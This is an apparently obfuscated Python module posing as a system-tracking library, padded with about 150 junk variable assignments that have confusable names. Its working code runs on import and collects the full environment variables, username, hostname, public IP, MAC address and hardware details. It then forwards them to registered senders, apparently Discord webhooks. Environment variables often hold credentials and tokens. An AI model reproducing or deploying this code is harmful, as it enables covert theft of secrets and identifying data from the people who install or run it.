XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = 697
B152 = "fkEdVBQSLIAvnvdmYuwqCLGTuUhpwmmqtWfGkLefQDRPcyxYvxiNKvsWGNzYevamSsHnOKXsPUMOPbL"
AAaaAaaAaaAAAAAAaAaaaaAAaaAAaaAAAaAaAAaAaaAAaAaAaAAaAAAaaAaaAAaaAaAaAAAaAaAAAaAaAAAAaAaAAaaAaAAAaAaAAAAaAAaaAAAAaAaaAAaAaAaaAAAaAAaAaAaaaaAAAAAAaAaAaa = "hnWpAgppDMURQgVoogHSvssTTCNEMRzMwTVwlHnzwplaiLzKQvQbAXXjZAtFdafpGXXahUOOiYQFrUd"
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu = "vTkESYppmWTZgrepZpbvXHVEhzZcVdQvgmyNVxCtIWFIbfFBwHUJnKWGBfvrOExppfjJroCMQOGHhjN"
IIIlIllIlIIlIllIIlIIIIIllllIIllIlIlllIIIIIIIlIIllIlllIllIlIlIIlIlllIIlIIIIIllIlIlIlIlIIlIIlIlIlllllllIllIIlIIllIlIlIIllllIlIlllIIllIllllIlllllllll = "zWWcJkXLUOlKrlNsQZRKzDSXJqCoUJMyVNkOUDuAvCFYJbCxkBvsQKLBSRWMmbbVajdqxbSOKMfrNAd"
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU = "lqQjbWkPnVLNkCngYkbMYlvhiCTyJfQJGQsfIyHykIOMgqqUbRyXtUbyvIGmqFBLlhLWjgPIXHjaNZs"
P1680527564528571142 = 372
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY = "vBnBVbbPGtYahdoPJxtGcEuQhwKTLVlnHNWWsMaWHDMukSmKmGAoAjnVMLwKajFZnPZnGCdMJGjgUSJ"
IIlllIlllIlllIIlIllIIIlIllIlIlIlIIIlIlIlIllIlllIIllIllIIIIIIlIlIlllIlIllllIIIIllIlIlllIlIIIIIlIlIlIIlllIIllIllllllllIllIIlIIIlIllIIlIIllll = 265
G16805275645283759136 = "vxQaxmjfCotVPJJamvNuHFdLysQOtZHcbVPQdgObVkNoKblhAtodWJURNtWyiLTuXsmTXXqpZhmVepN"
aAaAaAAaaAaAaaAaaaAaAAAaAAAaaaAAAAAAaAAaAaAaAaaAaAaAAAAAaAAAAAaAaAAAaaAaAaAaAAAaAAAaAAAaAaAAAaaaAaAaaAaAaaaaAAaAaaaaAaAAAaaAaAaAAAAaAa = "lQCWEqBgHTikfKwyhNtKPQhRlIKFsPdgoPuCjVGZILYMhJFaWwUdRUqerZrLULPkBqXXQfxGNRZkMxz"
cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc = "svHPBNQgEeKZnWWspXLeHyEQSAxXcfovXbmaQYtLCzTzRFpXsOUGMijEdMBMaMZxCCgqkNMVRyxPuqv"
R130 = "PnfHKiBfkCwGgAzKzDALgnNSVUdNmwIlihPYEtsLgExPctXTuUuqJcvQgAvHZHUAUVgsDOTMfTKCwFA"
AaaaAaaaAAaAaAaAAAaaAaAAAaaaaaaAaaaAaaAAaAaaaaaaaAAAaaaaAaaaAaaaaaaaAAaaAAAaaAAaAaAaAAAAaaAaAaAAAaaAAaaaAaAAaaaaAaaAaAaaaaaaaAaa = "XcHgQxCDMmGBiyurUjgYUbDwGfnwGstGMNOHRURhlxdYiUkmwvPhnqLTNSSoccWtSfJVqwIgGQPPAPU"
aAAaaAAAAAAAaaAaAAAAaAaaAaaAAAAAAaAAAAAAaAaaaaaAAaaaAAAaaAAaAAAAaaAAaaaAaaaAAaAAAAaAAaaaAAaAaaaaaAaaAaaAaaaAaaAAaaaaAAAaAAaaAa = 276
tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt = "qumoEDNELCAIScTnmlKRFmZbAkAJcBxySqmwSBWDNTzYTLLziSIzgZtJcxCuQwNUKpHVkmKTPkmxVjo"
RXAVGiwbylTbpEswfJUzaBrbdSFBnbEXRIPgIMvnRPtCZUiyseJJdDylWvfhbrwDYgMliwvTqgrhWKo122 = 397
v16805275645275006120 = 712
llIIlIllIlIIIIIIIlIIIIIlIlllIlIIlIIIIllIlllIIllIlllllIIlIIIIIIIllIIIlIIllllIllIllIlllIllIlllIIllllllIlllIIIIllIIlIIIll = 778
F16805275645273836116 = 295
X16805275645273383114 = 531
weCfHqRSczazBfEcipAqCfABjyRQputLpKsKqvNUcPotKXLDenecIGJDHCJGwezTQJKKzrztiNzIUqW112 = "yBgHFWwBrBcOHFRwNnUSPdtuiaSFHYMPgpNcCRIJlPncsScDjRqsLoYYWIYThHpwCNgPcWnJCwnOPiO"
Z16805275645271614110 = 224
llIlllIIlIIIllIIlllllllIIIlIllllIIIlIIlIIlIIlIlIIlIIIIlIIIllIlIlIlIllllIIlIIlIlIllIlIlllIIlIlIllIIIllllIlIlI = 453
PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP = 167
Z104 = 280
VIDasPmRTCNGUtGEqVUoJDkFOJjXjdTHkzlbxXKGAiClpFPqUPMDedKOdDnnvCIONnkfIIPmYrRYVAt102 = 583
T100 = 629
C1680527564526815298 = 55
c168052756452675596 = 251
C94 = "ZKZLOWzNlIqIWvFMBJVFZVzhuYsFhdTsuNXeaxtqjhXODhddpXbLjVsYWFaxOmnFIEIgZlymDsgyxyD"
aAAaaaAaAaAAaAaaAaaAaaaAAAAaaaaAaAAaAaAAAaaaAAaaaAaAAaAAaAaAaAAaAaaaAAAAaaAaAAAaAaaAaaaaaAaA = "IvAsmRxlsnneOOkAdbwKTvoECXdkesKQhjZmYwkaVfkcUpZHDuxRIUVEWGBWkHeYXhtwvCoiXsbQsmZ"
U168052756452647590 = "pThnoxDmbZSceHdNBMkkdPVpXYiNiuiFDeUkzOlAnyqyEWPSxuusMubgwWhznOOVLeNUXrECMuoRMmd"
IllllllIIllllllllIlIlIIllIllIlIlIIlIlIlIIlIlIIlIllIllIlIIlllIllIIllIlIlIIIlllIlllIIlIllI = 329
IIllIIIlIIIlllIIlIlIllllIlIIIIlllllIllIlIlIlIIlIllIIIllllIIllIlIIIIIIllIIlIIlIlIIlIlII = 285
H84 = "pUGlEkOaGALWfUiqBbQTAnPKDTFxyqBYzdbmfBdFrBflwRzrBvUJsQPEMDxAGysyDOlLpauVazaOmgz"
V82 = "zMyyfxBhEUKLWROjtReRdrLzjKDCffYLXOrZoohkEsKzZqbkbqLtWPVOwowgdKmUxSMnuwDUayVMGcR"
z1680527564525974880 = "AHBVpftlVJZNiklqmiBCOsWwxjrMtWpihXxvOLlaVfgACgUVYttAtPEYJgPaVDHpkTAvEMVDUzYDKQI"
IlIllIIIllIIIlIlIIIlIllIIIIlIIIIIllIIlIlIIllIlIlIIlllIllIlllIlllIlIlIlIlIIllII = 263
AaAaAaAAaaAaaAaaaaaaAaAAAaAaAaaaAAaaAaaAaAAaaaaAaaAAaaaaaaAaAAaaaaAaaaAAAAAA = "KTHfBiofPjhaFMFHNZmykWaDGJodnJRnjNldQahXbUQZGWbRKlAMiQTOJFnsbiApeXHccIbnXsPNIdo"
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE = "ammUnqhSoqHZUjjzuKwkfgjhOxnEBNJrVPcvmAkfKeMpwcqzRhiWetbpNqLZDAtSMDnpsuutTCdQanS"
llIlIllllllIllIlIIlIllIIIlIlIllllIllIllIllllIIllIlIlIIIlIIIIlIIIIIIIlIlI = "mtJpqwrJkRfdSuXnlXwxgsuTBlSbdiWYRnJOCsXCGqsmwwhFiMQZcmjOzoBdnjJhgPfHbENAuLrgVRB"
f70 = "OXAexmPRMFOmrYRXUFVQURZkPouhilGrWDIVTrssThLNAxSZqAGVeKJjrdmuXIwROnTCtYvHQscpNDr"
amNyxAMTMWmWeyaHLprQGosTrIWegGVzUpwGhVnXkpeQlSnwANOhFhvIdnxSvrWLHiXxInurDiIXaMh68 = "HJZzupdmkJSZSfHTyokisUYkBQadtfcJPWgYDQxJdUjofMOEaiCYJzOjkiDsXqPxsPBbFYdsLoRlRiF"
vouaeMvQqViHOdYgObGmGBTZIxtGqzNCAqwRruYUphRSNDrDjMRMXLUsNaLBhpOcwkwylggTzavMsCx66 = 805
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT = 277
llIllIIlIIIlIIlIIIllllllIIIIllIIlIlIlIIllllIlIlIlIllIIIIIIIlll = 247
TJCXDIqGcWWtGhAhgyxfGuFfTDrruRIdSNQSmCuqxJzTzRDWIVGofFtDSMYIGATrUlnoHhGvPsQQNTH60 = 199
M58 = 337
AAAAaAAAAaaaaAaaaaaAaAaaaAaaaAaAAaAAaAAAAaaAaaaAaaaAaAaA = 245
g54 = 498
llIIIIlllIIlIlIIllIIllIllllIlIIlIlIlIlIllllIlIlIllII = 287
AaAaaaaAAAaaaAaAAaaAAaAAAAAaAAaaaaaaAAAaAAaaAaAaAA = 434
z48 = "JEYmeJdXJIXdULlassnOzYObAfyxUAcdXoksYdlUwmXRDgdnbgVfHJWOEkHJFnaeQKHrWsUWLmsjiBt"
AaaaAAAaAAAaaaAAAaaaAaaAAaAAaAaAaAAaAAaAaAAAAa = 213
llIIIIlIIIlIlIIlIllIllIIlIlIIllIIIlllIlllllI = 274
H42 = "LQSNAqNlIqXPVThayDRXDvJUdgNdHIpNSTWsHxeivGGScnNGwZEaKeqlfuiBQcVvJRXLNQGwGLKRAqG"
AaaAAAAaaaaaAAAaaaAAaaaaaaaaaAAaaAaAaAaA = 681
U168052756452450338 = 267
umqGPgZVMGIxNZzRVwoDUnECfMtsnVZrzMVrfMuhqmDrKALbgRNVwLDfFDSyWosnvsFhwnhnTxIYmoO36 = "lAZWbFfCnHnzzxjmDsulUWULyLGrbJdUGTJFUjdknKtRseqRdIYbUPgbfDkisDFyNpWkzxrlmyBJAlQ"
llIIlIlIlIIlllllIIllllIllllIIlllll = "vwSItdOJrjoRQupbLsoaHhGTcbqtFyhyxNAkjtKfAAmOZfFHssRHuOFFeidYiRbynUlKAycRfCXrYdI"
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = "qdeKJBJEDNQjXFfLUfPTgDBsZCtbEpoeAezASGkRgDiDrQDxRZMdkMYwopsiydHQOecppKsarGTKgnh"
IIIllIllIIIlIIlIIIIlIIllIIlIlI = 307
IlIIIIllIIIlIlIIlIIIIIIIIlll = 279
aAAAAaAaAaaAaAaaaAaaaAaAAa = "OzLikkbmwWQlksdSDxGykNKKSVgNLRwDUNAOFNTlbjansYhdzKjFEMnGgDDhfYSeMlFVrlhnYcesDwZ"
XQIEqgdqCPjPBoPVwMJdbMVHRYkGcLkLhDevwJDsQYPylxiIzjhpDdnrjGGMpFGcpVZtdVIuRleGCXy24 = "RNhaqOGgSrRoXVCnksrYyzDzZaIlnJvKvPqXmxemSZiJxBGHBDeMmFfXIqqgasCbuBhWXjSxBNXRLUh"
AAaaaaAAaaAaaaAAaAaaaA = 314
YBfMpfLSkYVMeOavppvlxaJfPDuadtquIvBlLbFhihQQHvtNpnvEPHYkWUmjXXgkHjqQGxaeGmMfXoG20 = 263
I18 = 982
aaaAAAAAAAaAAaAa = "AkYFKbAyTvhKGJLxrAAWKDTAkzWELYHGeFYaUoUvzNCoDUsqbuaXignqQMtKCIJiNJubfsjeNetFYwr"
D14 = 366
AaAAAaaaaAAA = "oVxnfXeCaYnEstrTMlDCTpHvUndpBkZeqhEVbYSuuAJrTVUxFUGAOgropiZwmPLeIOewyeGDNUgoaRD"
wzzxvSEAggJCGHmzPVapBNsGptkgfhyGcGHVzwlLQzHckhEzPsOAeGKEwPcHqjdDHJtpJDhFbBCmAYn10 = 632
llllIIIl = 375
aaaaaa = 582
BBBB = "JGlbeAOkcYBlglaVeNpACMEeFBjGNxBJtyrRXVmySvmMyCciYeDkGFAVbXguvzWFaChcGhPpULYneaF"
mkQgpgUEOSOlsmzuuWnIeQWPlyyaLgRONhTfkOeECmHMritzgxqeWqgSZUioRkrpLFSeEFqhpnrgYnv2 = 677

from scopes import TrackingScope
from requests import get
import os
import platform
import sys
import subprocess
import psutil
import uuid
import re
import atexit
from discord_webhook_binder import DiscordWebhookBinder

i = []

lI = {
    'start': ["env", "os_name", "os_version", "os_arch", "os_release", "os_dist", "os_dist_version", "username", "hostname", "ip", "mac", "cpu", "gpu", "gpu_count", "ram", "ram_used", "disk_used", "disk_max"],
    'stop': []
}

def add_tracker(name, scopes):
    lI[name] = scopes

def _execute_tracker(scopes):
    grVEUrisHJweShvGGOQNcbkqZLQxwlSXHYxsDOBSbmQXTzlWHJaPTiqGEVAnbPslDxqdsUzWpLQkYFJ3 = []
    for KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 in scopes:
        grVEUrisHJweShvGGOQNcbkqZLQxwlSXHYxsDOBSbmQXTzlWHJaPTiqGEVAnbPslDxqdsUzWpLQkYFJ3.append({
            "name": str(KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4),
            "value": str(_get_scope_value(KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4))
        })
    _message_binders(grVEUrisHJweShvGGOQNcbkqZLQxwlSXHYxsDOBSbmQXTzlWHJaPTiqGEVAnbPslDxqdsUzWpLQkYFJ3)

def _get_scope_value(KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4):
    if KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'env' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.ENV:
        return os.environ
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'os_name' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.OS_NAME:
        return platform.system()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'os_version' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.OS_VERSION:
        return platform.version()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'os_arch' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.OS_ARCH:
        return platform.machine()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'os_release' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.OS_RELEASE:
        return platform.release()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'os_dist' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.OS_DIST:
        return platform.version()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'os_dist_version' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.OS_DIST_VERSION:
        return platform.release()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'username' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.USERNAME:
        return os.getlogin()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'hostname' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.HOSTNAME:
        return platform.node()
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'ip' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.IP:
        return get('https://api.ipify.org').content.decode('utf8')
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'mac' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.MAC:
        return ':'.join(re.findall('..', '%012x' % uuid.getnode()))
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'cpu' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.CPU:
        return str(platform.processor())
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'gpu' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.GPU:
        return subprocess.check_output(["nvidia-smi", "-L"]).decode('utf8')
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'gpu_count' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.GPU_COUNT:
        return len(subprocess.check_output(["nvidia-smi", "-L"]).decode('utf8').split(' ')) - 1
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'ram' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.RAM:
        return str(round(psutil.virtual_memory().total / (1024.0 **3))) + " GB"
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'ram_used' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.RAM_USED:
        return str(round(psutil.virtual_memory().used / (1024.0 **3))) + " GB"
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'disk_used' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.DISK_USED:
        return str(round(psutil.disk_usage('/').used / (1024.0 **3))) + " GB"
    elif KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == 'disk_max' or KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4 == TrackingScope.DISK_MAX:
        return str(round(psutil.disk_usage('/').total / (1024.0 **3))) + " GB"
    else:
        return "Unknown KLQaxgLHVeAvjgYErNWahvFUFGcqEaOMVGKygZBYutMuBGmHCTgzMcAsTlRPNBgjjGznwcBVtYqigqa4"

def _message_binders(scopes):
    for binder in i:
        binder.send(scopes)

def bind(binder):
    i.append(binder)

def track(name):
    _execute_tracker(lI[name])

def start():
    _execute_tracker(lI['start'])

def stop():
    _execute_tracker(lI['stop'])

atexit.register(stop)
start()
u168052756452327041 = "QJVyUPVNsZvprmxbOGnTGRHFECGEDOJFIJlESuAuOFTjgNHLpDHahyyVXjaRYlteJGBdlBKaJOzhSDx"
Aaa = "ezYUqnxUFqWlOqInbJsnbKqKonjQgeJodaqjLasvNAmiRBvHFBuuhZBPQhnbcaJtIjfhIODcpBpFsQY"
AaaaA = 462
L168052756452347857 = "ejvNJyTMMJmBKHxVykzMUhotSpDGAVXttfhSPrxXQhoGUMZgejfzeJdIgCXCQRZIjKKcnFWazskqutI"
vHscltpLCoilTwJAKMHhXAlkcYFlUUdNgXZrZVdgcLREZxkcaNlzsSQZSppEytRbchnkVAvFhuSLBbD9 = "DjJcSrCUmzDblAuZfWUaWkKlQTenBzpfMRgExMkcReNaJADYeItxwAFAOGQnfOsMnNJOOzlqnseVdOD"
CCCCCCCCCCC = 72
t1680527564523707413 = "mwqhtTQEHCjZXQTFQGFAtdbHYcFcLVaoWPzVRbCZrtaPuKWTsGnXEDEkBYffmvMlznhsrzGXbuqUHvf"
IlIIlllIIIIIlll = 422
QQQQQQQQQQQQQQQQQ = "AOYQLSjfyhDBLziLTGWMDhySORVxHXLKsDkAiVvimZnKbJjpFEHQHHEySZBJlBvZSYmiUNGoGMqdHUE"
aaaAAaaaaaaAAAAAaaa = 561
O1680527564523927221 = 190
B1680527564523998723 = "JnebAbsITyxrfssqnCoVnuOiuwmicZXHoRfcPwxGPArEXLDolxlkXBVyvLHVcxEJNxlSmYPQSsSvjds"
DDDDDDDDDDDDDDDDDDDDDDDDD = "tumedznrsuEElkUVXEmLmoRkzYBuLeLBgSABatBOkBVlxdYGXriNLXwzbwSamqPzZUyDnANJytGGsDi"
aaAaaAaAaAAaaAAaAaAaAAaAAAA = 941
AaaAAAaAaaAaAAAaAAAAaAaaaaaAa = 17
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = 357
IlIlllllllIlIIlIlllIllIlIIIIlllIl = 290
IlllllIIlllIlIlIlllIlllllIIIIIlIIll = 218
reSSPNGEzwVSfHVxrjmeVDIlSoaalZDwiHRJJAadtGOfdDrzqygsHUycRflVTfjAeWUtnRfoAHyUlQI37 = 634
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY = 254
w1680527564524534541 = 316
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = 470
aAAAAAAaAAAAAAAaaAaAAaAAaaaaAAAAAaAaAAaaAAaAa = 606
lIIlllIllIIlIIlIIllIIlllIlllIIIIlIIIIlIIIllIlII = "vgidUDfIaDQaEwGFSYpTVikePAreGupqkswLTZNztKLdWQwwVBvsUZptMDLmJfZbvlVgmrcAYQEPpEc"
b1680527564524772449 = 438
xvWNdeOACEGWGUMvDlDlveovPzdongWNaWOFYwyzYaLnIJTSIrIHmmtOYSiFVfkiTnigTARJGcMZHCg51 = 362
D53 = 803
Y55 = 887
zXjhwjVypmqZhYwTaWfVyAzeoOZBogRBfjJdMGddkxKTJGUtcNUPZAKcuEdAQPXaNXhmQTzJVnVkpap57 = "mTIdTYcUyZCTFkxLrVgfKVJgnOiCXKMDLNrhueamkMKDZngkabHMKRAfDrRYnlfGurnJmWlMUNHZLss"
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww = 155
m61 = "LZKUNTfnhqRslvjhFbkUjAMqBljxWtcSmsGCsLfidQSauETFjHAZHvQtpJQACHYbScyOwuaFrvFWbjt"
IlIIlIIIllIllIIIlIIIllIlIllIIlIlIIllllIIIIllIIlllIlIIllIllIIllI = 294
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm = "RXbCnpmfhwYPLUoTtrPnbeBGfHsqIWXTkdjsZxLMcESRVvQNALMVvmxBGBlNXZlfCIccQHkJnwJsoIj"
O168052756452526567 = "NeTjxqsIDodZpzGYXVSIUuZXGAkbkfkfzcpIIjUUyiFTPPMmQimrQBUnjqAGWapXORCBOpTpLruIsVm"
aaaaaAAAAaaAAAAaaaaaaaaaaaAaAaaaAAAaaAaAAAaaaAaaAaAaAAaaaaAAAaaAaaaaA = "nWDZvWBRnqgffjPyVGFgvjcukupsIbroYbCUMJtNMcywCVVoBQRTrmslrXGmfTtCLPnUGNQKFPCmvBL"
lIllIllIlllIllIlllIIlllIlllIIIlIIlllllIllIIIlIIIllllIIIIIllIIlIllIllIll = "jWJPttUDVAOEbwzUobqNtQzZxPyisViSWNAnmhUPLIYqFMOPRjytHunnadWNzYnrMUZVouBlOJRvqUR"
w1680527564525617673 = 930
U75 = "aIBYAROYEPzoAVkKVqxwagbbStWIxjtWbRaoxCjjaRYAZhGoJEmGGqeISEHUKyOdWxffiMxqSYiEXvu"
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU = 290
OJXVKtEhZcFooOtRsgQMfSinqroOBASZUNSzJMvrISmTuAKRSyaNCmsaYzZlUAdPvAFUumSwwhoJdHb79 = "rzCzhoXSTNgpIaosGlqMpTLDdqBQNCzLdKNAmakxEwQpXVcZSNIVhNJaFgnJtPWsbMQPeedVlRFKtrB"
IIIIlIIlIIIIIllIllllIlIlIIIlIIllIllIIIIIIIllllIlllIIIlIllIIlIIllIllIlllIIIIlIllll = "IfNWbDZjygAvFfUyLnVBTWHAZJlKzNezRdEcAqHWtuhScHaAQSlRVrgEXxnZxsWzAMKvGGoJaDyAZpp"
aAaaaaAaaAaAaaAaaaaaaaAaAAAaaAaAAaAaaaaaaAaaaaaaaAAAAaAaAAAAAaaAaAaaaAaAaAAAAaAaAaa = 345
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = 829
AbggJBNhawxfRIwPHHzaYIcBjkBZaJNpOJpuUPPOPnrpxRFuKomvGvHDLoZiYobNshoYtUxXqnWvLGn87 = 335
IllIllIlIIIllIIllIlllllllIIllIIllIIIIlIlIIlIllIlIIlIlIllIlIlIIllIIllllIIlIIIlIIlIlllIllll = "KuTIYCieJRUPKJhrgWmDsBWXYUiXYQRYgWnYABBRyfdQGhtdyLhplCKcKcCPNVcPOLtdIuOgkkSsSwg"
HhYzSjfGamWeErcEpQAKxWRRTKmJOAqHDkljfuyXYrgtsXCnrCgjUirKoNlydtKykDoqlXGPRKDLKAt91 = 216
ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp = "cQExMJkaIcxYtDVxHLBENxDBHiBbzSKvsMNqLwoCpStWzadaaVExEfkQXmKGtjbsLkrpgKgcROYIcdq"
aaAaAAaAaaaaAaaaAaAaaaaaAaaAAAaAAAaaAaAaAAaAAAAAaAaaaaAaAaAaAAaAaaaaAaAaaAAAAAaaAaaAAaaaaAaAaaa = 193
b1680527564526807597 = "SCvndEfKjWeiolTFhaWnYwQZQaBByHloWBeChJTjZqzyokUaWxClWdnSGyCDGqAfsVuSOmPaEBLQuvE"
V99 = "VNRGuHaBKFmyUFPnsdFOdBxOLDfXZBVXCLIjJbNuCiLDZPqAyxsvtJAZBjazdZcDiJXXotEAOegYFPU"
k101 = 431
